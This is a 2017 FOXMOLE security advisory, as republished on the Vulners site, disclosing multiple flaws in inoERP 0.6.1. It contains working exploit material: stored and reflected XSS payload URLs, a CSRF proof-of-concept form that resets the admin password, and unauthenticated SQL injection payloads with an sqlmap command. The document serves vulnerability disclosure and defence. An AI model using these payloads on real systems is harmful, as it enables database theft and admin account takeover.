Vulners
Lucene search
inoERP 0.6.1 CSRF / XSS / SQL Injection
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=== FOXMOLE - Security Advisory 2017-01-25 ===
inoERP - Multiple Issues
~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Versions
=================
inoERP 0.6.1
Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation
Technical Risk: critical
Likelihood of Exploitation: medium
Vendor: inoERP
Vendor URL: http://inoideas.org/ / https://github.com/inoerp/inoERP
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt
Advisory Status: Public
OVE-ID: OVE-20170126-0002
CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Impact
======
There are multiple SQL Injection vulnerabilities, exploitable without authentication.
An attacker could use the SQL Injection to access the database in an unsafe way.
This means there is a high impact to all applications.
The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities.
Issue Description
=================
The following findings are only examples, there are quite more. The whole application should be reviewed.
All items tested using FF52.
1.) Cross Site Scripting:
Stored:
Create a new Question in the -->Forum --> Ask a question
Vulnerable fields : Title, Content
Used Payload: Test<script>alert("xss")</script>
Response:
[...]
<title>Test<script>alert("xss")</script> - inoERP!</title>
[...]
The latest questions are included in the start page which means the entered payload gets executed directly in the start page.
Reflected:
With Auth:
http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7
http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)
%3C/scRipt%3E
http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report
Unauthenticated:
http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E
2.) No protection against Cross Site Request Forgery Attacks:
PoC: Changing the admin user credentials.
<html>
<body>
<form action="http://<IP>/inoerp/form.php?class_name=user" method="POST">
<input type="hidden" name="headerData[0][name]" value="user_id[]" />
<input type="hidden" name="headerData[0][value]" value="1" />
<input type="hidden" name="headerData[1][name]" value="username[]" />
<input type="hidden" name="headerData[1][value]" value="inoerp" />
<input type="hidden" name="headerData[2][name]" value="enteredPassword[]" />
<input type="hidden" name="headerData[2][value]" value="test" />
<input type="hidden" name="headerData[3][name]" value="enteredRePassword[]" />
<input type="hidden" name="headerData[3][value]" value="test" />
<input type="hidden" name="headerData[4][name]" value="first_name[]" />
<input type="hidden" name="headerData[4][value]" value="inoerp" />
<input type="hidden" name="headerData[5][name]" value="last_name[]" />
<input type="hidden" name="headerData[5][value]" value="inoerp" />
<input type="hidden" name="headerData[6][name]" value="email[]" />
<input type="hidden" name="headerData[6][value]" value="[email protected]" />
<input type="hidden" name="headerData[7][name]" value="phone[]" />
[..snipped...]
If a privileged user activates the request, the admin user id=1 is set to "test".
3.) SQL Injection:
Auth required:No
#####
http://192.168.241.143/inoerp/form.php?
Parameter: module_code (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY clause
Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN
0x74657374 ELSE 0x28 END))-- qkmO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: module_code=test' AND (SELECT 8706 FROM(SELECT
COUNT(*),CONCAT(0x716b7a6271,(SELECT
(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: module_code=test';SELECT SLEEP(5)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: module_code=test' OR SLEEP(5)-- STgC
Exploitable using e.g. SQLMAP
Blind SQL Injection:
sqlmap -u
"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all"
-p "content_type%5b%5d" --dbms="MySQL"
Parameter: content_type[] (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: content_type[]=-8366' OR 7798=7798 AND
'eanR'='eanR&search_text=3&search_document_list[]=all
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: content_type[]=test' OR SLEEP(5) AND
'exIO'='exIO&search_text=3&search_document_list[]=all
#####
4.) Session Fixation:
After a successful login the SessionID PHPSESSID remains the same:
Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
Temporary Workaround and Fix
============================
FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed.
History
=======
2017-01-25 Issue discovered
2017-01-26 Vendor contacted -> no response
2017-02-20 Vendor contacted again -> no response
2017-03-06 Vendor contacted again -> no response
2017-03-27 Advisory Release
GPG Signature
=============
This advisory is signed with the GPG key of the FOXMOLE advisories team.
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEjrQMZqTYqiY2IftqOBIJIZnjJ3wFAljYxkQACgkQOBIJIZnj
J3xoqg//SGIzPCv5wyWJsYfChEfix+7NTjFOQfUtbfzqd7aLVYuSf/UWPBWdiA37
lmtyWuJnq+JBXL654fOvxjXaZkUE/NXmn2Eqz/ICL33ZHeXmTM7V/PTbrphL1xw3
NDvSlpxShRMLjSaP/AmQkRRmAqzLq8M6g71+aooq8YHYshXwhPOnWLym5GDQhCIp
9IruFoXKVVhxVtopy7+bvol5dUGdfGCQDAW5STc3L7Cvh0DoMyQvtvAZoe+kdsMd
yVf42j3ng+5H3zsdSz26dgrPWOqFnD0VcG6dsw0RgUl5VwfsvwzRDytsIck3jk6B
YTlIkrrVNg6P1gqHH8DSqrGIXR61LQj0jaO24HizXv9/oRsrxRdNeRoe4QwaSNN0
QsPFT4JNW+haGt7sq2AOLbnZyTWnv/U7w7kq2kOn5/sVeHi9BYBBy11mZ6m9iN+z
W4deHitwT4arJScrWvzeLYvQkLudxiomYslQZ4GjfYi4j4Fw5kaPfsDOk1JPzlym
q47Bc70trmF2RkRTmNzHE0W6v/Dmpt5JlIbrBCABsQp+3uc7ovCEi+ggu4seeQq/
YMEe0uA0zheA24a7XSyuybZN0wpRz1Uq7/umPYHmwO/UDfvJcBan3pIBCTFb7qRy
CZU/x6ZOg/WZOHHJ7OWvkIx1A4/5pH5+BfnzeLfceyPIZX1Qcho=
=aQdY
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2017 00:00Current
0.3Low risk
Vulners AI Score0.3